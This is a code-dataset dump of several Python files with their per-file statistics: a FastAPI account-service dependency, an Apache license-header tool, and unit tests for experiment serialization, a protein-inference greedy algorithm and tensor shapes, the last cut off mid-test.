| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7fc4662f4f37a3f0d333cb7a1041c0036bb00303
| 230
|
py
|
Python
|
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
application/server/routers/api/endpoints/accounts/deps.py
|
chaotism/fastapi-purser
|
c83a063e953efdf95fddf95828f5fa2d75933363
|
[
"MIT"
] | null | null | null |
from domain.accounts import AccountService, MotorAccountRepository
def get_account_service() -> AccountService:
    """Construct an AccountService wired to a MotorAccountRepository."""
    # TODO: add excepting error and connection close
    repository = MotorAccountRepository()
    return AccountService(repository)
| 28.75
| 66
| 0.769565
| 21
| 230
| 8.333333
| 0.857143
| 0.411429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 230
| 7
| 67
| 32.857143
| 0.921053
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 0
| 1
| 0.2
| true
| 0
| 0.2
| 0.2
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3d3947b5100b4b2b65e9e0665ed2cfe45d6521b3
| 55
|
py
|
Python
|
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
4_src/3_other/1_surasura-python/q3-1/q3-1.py
|
hirobel/todoapp
|
834e6dcdd3e6c227a79004c89430c6853935b23c
|
[
"Apache-2.0"
] | null | null | null |
# Print the result of each integer comparison next to its label.
for template, outcome in (('5<3:{}', 5 < 3), ('5>3:{}', 5 > 3)):
    print(template.format(outcome))
| 27.5
| 27
| 0.545455
| 12
| 55
| 2.5
| 0.333333
| 0.266667
| 0.466667
| 0.866667
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 0.018182
| 55
| 2
| 28
| 27.5
| 0.407407
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
3d5cc719ef15d600ff812aa507f334a121294758
| 6,310
|
py
|
Python
|
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | 1
|
2019-04-26T18:35:40.000Z
|
2019-04-26T18:35:40.000Z
|
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | null | null | null |
tests/lint/add_asf_header.py
|
baowenlei/tvm
|
6b2e18ed96fad26b4a5e5f8a6dcbedf9206c9a65
|
[
"Apache-2.0"
] | 2
|
2019-05-24T17:22:38.000Z
|
2019-06-14T23:30:24.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Helper tool to add ASF header to files that cannot be handled by Rat."""
import os
import sys
header_cstyle = """
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
""".strip()
header_mdstyle = """
<!--- Licensed to the Apache Software Foundation (ASF) under one -->
<!--- or more contributor license agreements. See the NOTICE file -->
<!--- distributed with this work for additional information -->
<!--- regarding copyright ownership. The ASF licenses this file -->
<!--- to you under the Apache License, Version 2.0 (the -->
<!--- "License"); you may not use this file except in compliance -->
<!--- with the License. You may obtain a copy of the License at -->
<!--- http://www.apache.org/licenses/LICENSE-2.0 -->
<!--- Unless required by applicable law or agreed to in writing, -->
<!--- software distributed under the License is distributed on an -->
<!--- "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -->
<!--- KIND, either express or implied. See the License for the -->
<!--- specific language governing permissions and limitations -->
<!--- under the License. -->
""".strip()
header_pystyle = """
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""".strip()
header_rststyle = """
.. Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
.. http://www.apache.org/licenses/LICENSE-2.0
.. Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
""".strip()
header_groovystyle = """
// Licensed to the Apache Software Foundation (ASF) under one
// or more contributor license agreements. See the NOTICE file
// distributed with this work for additional information
// regarding copyright ownership. The ASF licenses this file
// to you under the Apache License, Version 2.0 (the
// "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing,
// software distributed under the License is distributed on an
// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
// KIND, either express or implied. See the License for the
// specific language governing permissions and limitations
// under the License.
""".strip()
FMT_MAP = {
"toml" : header_pystyle,
"yml": header_pystyle,
"yaml": header_pystyle,
"rs" : header_cstyle,
"md" : header_mdstyle,
"cmake" : header_pystyle,
"rst" : header_rststyle,
"gradle" : header_groovystyle,
}
def add_header(fname, header):
    """Prepend ``header`` (plus a blank line) to the file at ``fname``.

    Prints a diagnostic and returns without modifying the file when the
    file does not exist or already contains the ASF license marker.
    """
    if not os.path.exists(fname):
        print("Cannot find %s ..." % fname)
        return
    # Read via a context manager so the handle is closed deterministically;
    # the original `open(fname).read()` leaked the file object.
    with open(fname) as infile:
        orig = infile.read()
    if "Licensed to the Apache Software Foundation" in orig:
        print("Skip file %s ..." % fname)
        return
    with open(fname, "w") as outfile:
        outfile.write(header + "\n\n")
        outfile.write(orig)
    print("Add header to %s" % fname)
def main(args):
    """Add ASF headers to every file listed in the Rat report ``args[1]``.

    Report lines of the form ``File: path/to/file`` are parsed; each path is
    dispatched to add_header() with the style matching its file suffix.
    """
    if len(args) != 2:
        print("Usage: python add_asf_header.py <file_list>")
        # BUGFIX: previously fell through and crashed with IndexError
        # on args[1] after printing the usage message.
        return
    with open(args[1]) as report:
        for l in report:
            if l.find("File:") != -1:
                l = l.split(":")[-1]
                fname = l.strip()
                suffix = fname.split(".")[-1]
                if suffix in FMT_MAP:
                    add_header(fname, FMT_MAP[suffix])
                else:
                    print("Cannot handle %s ..." % fname)


if __name__ == "__main__":
    main(sys.argv)
| 38.47561
| 75
| 0.70523
| 901
| 6,310
| 4.90677
| 0.147614
| 0.08143
| 0.035286
| 0.043429
| 0.843248
| 0.843248
| 0.834879
| 0.834879
| 0.834879
| 0.834879
| 0
| 0.005927
| 0.197781
| 6,310
| 163
| 76
| 38.711656
| 0.867444
| 0.133439
| 0
| 0.071429
| 0
| 0
| 0.791804
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015873
| false
| 0
| 0.015873
| 0
| 0.047619
| 0.039683
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43f172838ed14b0fa0dc562492d5b047740930f8
| 7,811
|
py
|
Python
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 13
|
2020-11-12T21:50:09.000Z
|
2022-03-03T11:01:27.000Z
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 3
|
2020-12-04T12:49:37.000Z
|
2021-05-06T11:41:31.000Z
|
tests/test_serialization.py
|
arima0714/extrap
|
ac535fa9a4d10ecb59a29f063ff0515b6a98517f
|
[
"BSD-3-Clause"
] | 6
|
2021-01-14T16:06:47.000Z
|
2021-09-01T09:54:37.000Z
|
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import unittest
from marshmallow import ValidationError
from extrap.entities.experiment import ExperimentSchema, Experiment
from extrap.fileio.text_file_reader import read_text_file
from extrap.modelers.model_generator import ModelGenerator
class TestSingleParameter(unittest.TestCase):
    """Round-trip a single-parameter experiment through ExperimentSchema and
    compare every component against the original."""

    @classmethod
    def setUpClass(cls) -> None:
        # Serialize the experiment to JSON and load it back once for all tests.
        cls.experiment = read_text_file("data/text/one_parameter_1.txt")
        experiment_schema = ExperimentSchema()
        serialized = experiment_schema.dumps(cls.experiment)
        cls.reconstructed: Experiment = experiment_schema.loads(serialized)

    def test_setup(self):
        self.setUpClass()

    def test_parameters(self):
        self.assertListEqual(self.experiment.parameters,
                             self.reconstructed.parameters)

    def test_measurements(self):
        self.assertDictEqual(self.experiment.measurements,
                             self.reconstructed.measurements)

    def test_coordinates(self):
        self.assertListEqual(self.experiment.coordinates,
                             self.reconstructed.coordinates)

    def test_callpaths(self):
        self.assertListEqual(self.experiment.callpaths,
                             self.reconstructed.callpaths)

    def test_metrics(self):
        self.assertListEqual(self.experiment.metrics,
                             self.reconstructed.metrics)

    def test_call_tree(self):
        self.assertEqual(self.experiment.call_tree,
                         self.reconstructed.call_tree)

    def test_modelers(self):
        self.assertListEqual(self.experiment.modelers,
                             self.reconstructed.modelers)

    def test_scaling(self):
        self.assertEqual(self.experiment.scaling,
                         self.reconstructed.scaling)
class TestSingleParameterAfterModeling(unittest.TestCase):
    """Round-trip a single-parameter experiment after running the modeler,
    verifying that generated models survive (de)serialization."""

    @classmethod
    def setUpClass(cls) -> None:
        # Model the experiment first, then serialize and reload it once.
        cls.experiment = read_text_file("data/text/one_parameter_1.txt")
        ModelGenerator(cls.experiment).model_all()
        schema = ExperimentSchema()
        exp_str = schema.dumps(cls.experiment)
        cls.reconstructed: Experiment = schema.loads(exp_str)

    def test_setup(self):
        self.setUpClass()

    def test_parameters(self):
        # Removed a stray dead `pass` statement that followed this assertion.
        self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)

    def test_measurements(self):
        self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)

    def test_coordinates(self):
        self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)

    def test_callpaths(self):
        self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)

    def test_metrics(self):
        self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)

    def test_call_tree(self):
        self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)

    def test_modelers(self):
        self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)

    def test_scaling(self):
        self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
class TestSerialization(unittest.TestCase):
    """Schema validation and handling of unexpected keys in dumped data."""

    def test_validation(self):
        # A dumped experiment must validate cleanly against its own schema.
        experiment = read_text_file("data/text/one_parameter_1.txt")
        schema = ExperimentSchema()
        dumped = schema.dump(experiment)
        validation_errors = schema.validate(dumped)
        self.assertDictEqual({}, validation_errors)

    def test_additional_keys_in_experiment(self):
        # Unknown top-level keys are silently dropped on load.
        experiment = read_text_file("data/text/one_parameter_1.txt")
        schema = ExperimentSchema()
        dumped = schema.dump(experiment)
        dumped['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
        reconstructed: Experiment = schema.load(dumped)
        self.assertFalse(hasattr(reconstructed, 'TEST_ATTRIBUTE'))

    def test_additional_keys_in_measurements(self):
        # Unknown keys inside the measurements mapping are rejected.
        experiment = read_text_file("data/text/one_parameter_1.txt")
        schema = ExperimentSchema()
        dumped = schema.dump(experiment)
        dumped['measurements']['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
        self.assertRaises(ValidationError, schema.load, dumped)

    def test_additional_keys_in_measurement_obj(self):
        # Unknown keys inside a single measurement object are dropped.
        experiment = read_text_file("data/text/one_parameter_1.txt")
        schema = ExperimentSchema()
        dumped = schema.dump(experiment)
        dumped['measurements']['compute']['time'][0]['TEST_ATTRIBUTE'] = 'TEST_ATTRIBUTE'
        reconstructed: Experiment = schema.load(dumped)
        self.assertFalse(hasattr(reconstructed, 'TEST_ATTRIBUTE'))
class TestMultiParameter(unittest.TestCase):
    """Round-trip a two-parameter experiment through ExperimentSchema and
    compare every component against the original."""

    @classmethod
    def setUpClass(cls) -> None:
        # Serialize the experiment to JSON and load it back once for all tests.
        cls.experiment = read_text_file("data/text/two_parameter_3.txt")
        experiment_schema = ExperimentSchema()
        serialized = experiment_schema.dumps(cls.experiment)
        cls.reconstructed: Experiment = experiment_schema.loads(serialized)

    def test_setup(self):
        self.setUpClass()

    def test_parameters(self):
        self.assertListEqual(self.experiment.parameters,
                             self.reconstructed.parameters)

    def test_measurements(self):
        self.assertDictEqual(self.experiment.measurements,
                             self.reconstructed.measurements)

    def test_coordinates(self):
        self.assertListEqual(self.experiment.coordinates,
                             self.reconstructed.coordinates)

    def test_callpaths(self):
        self.assertListEqual(self.experiment.callpaths,
                             self.reconstructed.callpaths)

    def test_metrics(self):
        self.assertListEqual(self.experiment.metrics,
                             self.reconstructed.metrics)

    def test_call_tree(self):
        self.assertEqual(self.experiment.call_tree,
                         self.reconstructed.call_tree)

    def test_modelers(self):
        self.assertListEqual(self.experiment.modelers,
                             self.reconstructed.modelers)

    def test_scaling(self):
        self.assertEqual(self.experiment.scaling,
                         self.reconstructed.scaling)
class TestMultiParameterAfterModeling(unittest.TestCase):
    """Round-trip a two-parameter experiment after running the modeler,
    verifying that generated models survive (de)serialization."""

    @classmethod
    def setUpClass(cls) -> None:
        # Model the experiment first, then serialize and reload it once.
        cls.experiment = read_text_file("data/text/two_parameter_3.txt")
        ModelGenerator(cls.experiment).model_all()
        schema = ExperimentSchema()
        exp_str = schema.dumps(cls.experiment)
        cls.reconstructed: Experiment = schema.loads(exp_str)

    def test_setup(self):
        self.setUpClass()

    def test_parameters(self):
        # Removed a stray dead `pass` statement that followed this assertion.
        self.assertListEqual(self.experiment.parameters, self.reconstructed.parameters)

    def test_measurements(self):
        self.assertDictEqual(self.experiment.measurements, self.reconstructed.measurements)

    def test_coordinates(self):
        self.assertListEqual(self.experiment.coordinates, self.reconstructed.coordinates)

    def test_callpaths(self):
        self.assertListEqual(self.experiment.callpaths, self.reconstructed.callpaths)

    def test_metrics(self):
        self.assertListEqual(self.experiment.metrics, self.reconstructed.metrics)

    def test_call_tree(self):
        self.assertEqual(self.experiment.call_tree, self.reconstructed.call_tree)

    def test_modelers(self):
        self.assertListEqual(self.experiment.modelers, self.reconstructed.modelers)

    def test_scaling(self):
        self.assertEqual(self.experiment.scaling, self.reconstructed.scaling)
# Allow running this test module directly: python test_serialization.py
if __name__ == '__main__':
    unittest.main()
| 37.7343
| 91
| 0.729868
| 875
| 7,811
| 6.354286
| 0.134857
| 0.05036
| 0.082734
| 0.097122
| 0.855935
| 0.843525
| 0.843525
| 0.843525
| 0.843525
| 0.843525
| 0
| 0.003082
| 0.169249
| 7,811
| 206
| 92
| 37.917476
| 0.853753
| 0.080784
| 0
| 0.84058
| 0
| 0
| 0.054005
| 0.032375
| 0
| 0
| 0
| 0
| 0.26087
| 1
| 0.318841
| false
| 0.014493
| 0.036232
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a1012db735efaaad877bc7ba0d5753c097909864
| 7,882
|
py
|
Python
|
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | 4
|
2020-11-25T03:08:07.000Z
|
2020-11-25T23:28:06.000Z
|
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | null | null | null |
tests/unit/greedy_algorithm_test.py
|
MassDynamics/protein-inference
|
05cc9738a3fcd074d8e6789bb24979a9837082cf
|
[
"MIT"
] | 1
|
2020-11-25T04:52:04.000Z
|
2020-11-25T04:52:04.000Z
|
import unittest
from protein_inference.problem_network import ProblemNetwork
from protein_inference.reprisal.greedy_algorithm import GreedyAlgorithm
import networkx as nx
from copy import deepcopy
class GreedyAlgorithmTest(unittest.TestCase):
    """Unit tests for GreedyAlgorithm scoring, selection and allocation.

    The repeated inline graph construction has been factored into two
    private fixture builders; each test's network is byte-for-byte the
    same graph the original test built inline.
    """

    @staticmethod
    def _bipartite_network(edges, allocated=0):
        # Peptide nodes 1-3 (protein=0) and protein nodes 4-5 (protein=1);
        # every edge carries score=1.
        g = nx.Graph()
        g.add_nodes_from([1, 2, 3], protein=0, allocated=allocated, unique=0)
        g.add_nodes_from([4, 5], protein=1)
        g.add_edges_from(edges, score=1)
        return ProblemNetwork(g)

    @staticmethod
    def _unique_evidence_network():
        # Protein 4 has a unique peptide (1); protein 5 only shares peptide 2
        # via a higher-scoring edge (checks that 4 is still chosen).
        g = nx.Graph()
        g.add_nodes_from([1], protein=0, allocated=0, unique=1)
        g.add_nodes_from([2], protein=0, allocated=0, unique=0)
        g.add_nodes_from([4], protein=1, unique_evidence=True)
        g.add_nodes_from([5], protein=1, unique_evidence=False)
        g.add_edges_from([(1, 4), (2, 4)], score=1)
        g.add_edges_from([(2, 5)], score=10)  # check if we still choose 4
        return ProblemNetwork(g)

    def test_score_protein_basic(self):
        pn = self._bipartite_network([(1, 4), (2, 4), (2, 5), (3, 5)])
        score = GreedyAlgorithm().score_protein(pn, 4)
        self.assertEqual(score, 2)

    def test_score_protein_allocated(self):
        pn = self._bipartite_network([(1, 4), (2, 4), (2, 5), (3, 5)], allocated=1)
        score = GreedyAlgorithm().score_protein(pn, 4)
        self.assertEqual(score, 0)

    def test_score_all_proteins_basic(self):
        pn = self._bipartite_network([(1, 4), (2, 4), (2, 5), (3, 5)])
        scores = GreedyAlgorithm().score_all_proteins(pn)
        self.assertEqual(scores[4], 2)
        self.assertEqual(scores[5], 2)

    def test_score_all_proteins_asymmetric(self):
        pn = self._bipartite_network([(1, 4), (2, 5), (3, 5)])
        scores = GreedyAlgorithm().score_all_proteins(pn)
        self.assertEqual(scores[4], 1)
        self.assertEqual(scores[5], 2)

    def test_score_all_proteins_allocated(self):
        pn = self._bipartite_network([(1, 4), (2, 4), (2, 5), (3, 5)], allocated=1)
        scores = GreedyAlgorithm().score_all_proteins(pn)
        self.assertEqual(scores[4], 0)
        self.assertEqual(scores[5], 0)

    def test_highest_scoring_proteins_basic(self):
        pn = self._bipartite_network([(1, 4), (2, 5), (3, 5)])
        protein = GreedyAlgorithm().get_highest_scoring_protein(pn)
        self.assertEqual(protein, 5)

    def test_highest_scoring_proteins_tie(self):
        pn = self._bipartite_network([(1, 4), (2, 4), (2, 5), (3, 5)])
        protein = GreedyAlgorithm().get_highest_scoring_protein(pn)
        self.assertEqual(protein, 4)

    def test_highest_scoring_proteins_unique_only(self):
        pn = self._unique_evidence_network()
        protein = GreedyAlgorithm().get_highest_scoring_protein(pn, unique_only=True)
        self.assertEqual(protein, 4)

    def test_run_scores(self):
        pn = GreedyAlgorithm().run(self._unique_evidence_network())
        self.assertEqual(pn.network.nodes[4]["score"], 2)
        self.assertEqual(pn.network.nodes[5]["score"], 0)

    def test_run_protein_allocator(self):
        pn = GreedyAlgorithm().run(self._unique_evidence_network())
        self.assertEqual(pn.network.nodes[4]["major"], 4)
        self.assertEqual(pn.network.nodes[5]["major"], 4)

    def test_run_peptide_allocator(self):
        pn = GreedyAlgorithm().run(self._unique_evidence_network())
        self.assertEqual(pn.network.nodes[1]["allocated"], 4)
        self.assertEqual(pn.network.nodes[2]["allocated"], 4)

    def test_run_razor_tagging(self):
        '''could possibly test this directly but it fits in well here'''
        pn = GreedyAlgorithm().run(self._unique_evidence_network())
        self.assertEqual(pn.network.nodes[1]["razor"], True)
        self.assertEqual(pn.network.nodes[2]["razor"], True)

    def test_run_isomorphic(self):
        # Running the algorithm on equal copies must yield isomorphic results.
        pn = self._unique_evidence_network()
        pn2 = deepcopy(pn)
        pn = GreedyAlgorithm().run(pn)
        pn2 = GreedyAlgorithm().run(pn2)
        self.assertTrue(nx.is_isomorphic(pn.network, pn2.network))

    def test_run_systemwide(self):
        # run_system_wide must agree with running each network individually.
        pn = self._unique_evidence_network()
        pn2 = deepcopy(pn)
        pns = GreedyAlgorithm().run_system_wide([pn, pn2])
        pn1_non_par = GreedyAlgorithm().run(pn)
        pn2_non_par = GreedyAlgorithm().run(pn2)
        self.assertTrue(nx.is_isomorphic(pns[0].network, pn1_non_par.network))
        self.assertTrue(nx.is_isomorphic(pns[1].network, pn2_non_par.network))
| 36.831776
| 85
| 0.606826
| 1,165
| 7,882
| 3.91588
| 0.072961
| 0.055239
| 0.082858
| 0.119684
| 0.846778
| 0.827707
| 0.785182
| 0.785182
| 0.7637
| 0.7637
| 0
| 0.053828
| 0.241056
| 7,882
| 214
| 86
| 36.831776
| 0.708793
| 0.030576
| 0
| 0.717105
| 0
| 0
| 0.006291
| 0
| 0
| 0
| 0
| 0
| 0.144737
| 1
| 0.092105
| false
| 0
| 0.032895
| 0
| 0.131579
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a105ee947b8c2ba5a97bbf9ab2c69471b96bcd37
| 9,487
|
py
|
Python
|
test/test_tensor_shape.py
|
Fibertree-Project/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 2
|
2021-02-03T20:34:14.000Z
|
2021-02-04T06:36:51.000Z
|
test/test_tensor_shape.py
|
FPSG-UIUC/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 1
|
2021-06-19T02:59:01.000Z
|
2021-06-23T13:20:11.000Z
|
test/test_tensor_shape.py
|
FPSG-UIUC/fibertree
|
6fbb1971c31fcc9b27e09591a1ee2d66ae0e7b76
|
[
"MIT"
] | 1
|
2021-06-16T15:03:33.000Z
|
2021-06-16T15:03:33.000Z
|
"""Tests related to shape of a tensor"""
import unittest
from fibertree import Payload
from fibertree import Fiber
from fibertree import Rank
from fibertree import Tensor
class TestTensorShape(unittest.TestCase):
def test_shape_empty(self):
"""Test shape of empty tensor"""
t1 = Tensor(rank_ids=["M", "K"])
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [0, 0])
t2 = Tensor(rank_ids=["M", "K"], shape=[10,20])
self.assertEqual(t2.getRankIds(), ["M", "K"])
self.assertEqual(t2.getShape(), [10, 20])
def test_shape_0D(self):
"""Test shpe of 0-D tensor"""
t = Tensor(rank_ids=[])
p = t.getRoot()
p += 1
self.assertEqual(t.getRankIds(), [])
self.assertEqual(t.getShape(), [])
def test_shape_new(self):
"""Test shape of a tensor from a file"""
t1 = Tensor.fromYAMLfile("./data/test_tensor-1.yaml")
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [7, 4])
# Note: We cannot override the shape of shape from a YAML file
def test_shape_fromUncompressed_1D(self):
"""Test shape of a tensor from 1D nested lists"""
l1 = [ 100, 101, 0, 102 ]
t1 = Tensor.fromUncompressed(["M"], l1)
self.assertEqual(t1.getRankIds(), ["M"])
self.assertEqual(t1.getShape(), [ 4 ])
l2 = [ 100, 101, 0, 0 ]
t2 = Tensor.fromUncompressed(["M"], l2)
self.assertEqual(t2.getRankIds(), ["M"])
self.assertEqual(t2.getShape(), [ 4 ])
def test_shape_fromUncompressed_2D_A1(self):
"""Test shape of a tensor from 2D nested lists (tensor A)"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
t1 = Tensor.fromUncompressed(["M", "K"], l1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["M", "K"])
self.assertEqual(t1.getShape(), [ 7, 4 ])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["M", "K"]), [7, 4])
with self.subTest(test="Just rank 'M' as list"):
self.assertEqual(t1.getShape(["M"]), [7])
with self.subTest(test="Just rank 'K' as list"):
self.assertEqual(t1.getShape(["K"]), [4])
with self.subTest(test="Just rank 'M'"):
self.assertEqual(t1.getShape("M"), 7)
with self.subTest(test="Just rank 'K'"):
self.assertEqual(t1.getShape("K"), 4)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["M", "K"], authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["M"], authoritative=True), [7])
self.assertEqual(t1.getShape(["K"], authoritative=True), [4])
self.assertEqual(t1.getShape("M", authoritative=True), 7)
self.assertEqual(t1.getShape("K", authoritative=True), 4)
def test_shape_fromUncompressed_2D_A2(self):
"""Test shape of a tensor from 2D nested lists (tensor A, multiletter ranks_ids)"""
# 0 1 2 3
#
l1 = [ [ 0, 0, 0, 0 ], # 0
[ 100, 101, 102, 0 ], # 1
[ 0, 201, 0, 203 ], # 2
[ 0, 0, 0, 0 ], # 3
[ 400, 0, 402, 0 ], # 4
[ 0, 0, 0, 0 ], # 5
[ 0, 601, 0, 603 ] ] # 6
t1 = Tensor.fromUncompressed(["MA", "KA"], l1)
with self.subTest(test="All ranks"):
self.assertEqual(t1.getRankIds(), ["MA", "KA"])
self.assertEqual(t1.getShape(), [ 7, 4 ])
with self.subTest(test="All ranks specified"):
self.assertEqual(t1.getShape(["MA", "KA"]), [7, 4])
with self.subTest(test="Just rank 'MA' as list"):
self.assertEqual(t1.getShape(["MA"]), [7])
with self.subTest(test="Just rank 'KA' as list"):
self.assertEqual(t1.getShape(["KA"]), [4])
with self.subTest(test="Just rank 'MA'"):
self.assertEqual(t1.getShape("MA"), 7)
with self.subTest(test="Just rank 'KA'"):
self.assertEqual(t1.getShape("KA"), 4)
with self.subTest(test="Check authoritative"):
self.assertEqual(t1.getShape(authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["MA", "KA"], authoritative=True), [7, 4])
self.assertEqual(t1.getShape(["MA"], authoritative=True), [7])
self.assertEqual(t1.getShape(["KA"], authoritative=True), [4])
self.assertEqual(t1.getShape("MA", authoritative=True), 7)
self.assertEqual(t1.getShape("KA", authoritative=True), 4)
def test_shape_fromUncompressed_2D_B(self):
"""Test shape of a tensor from 2D nested lists (tensor B)"""
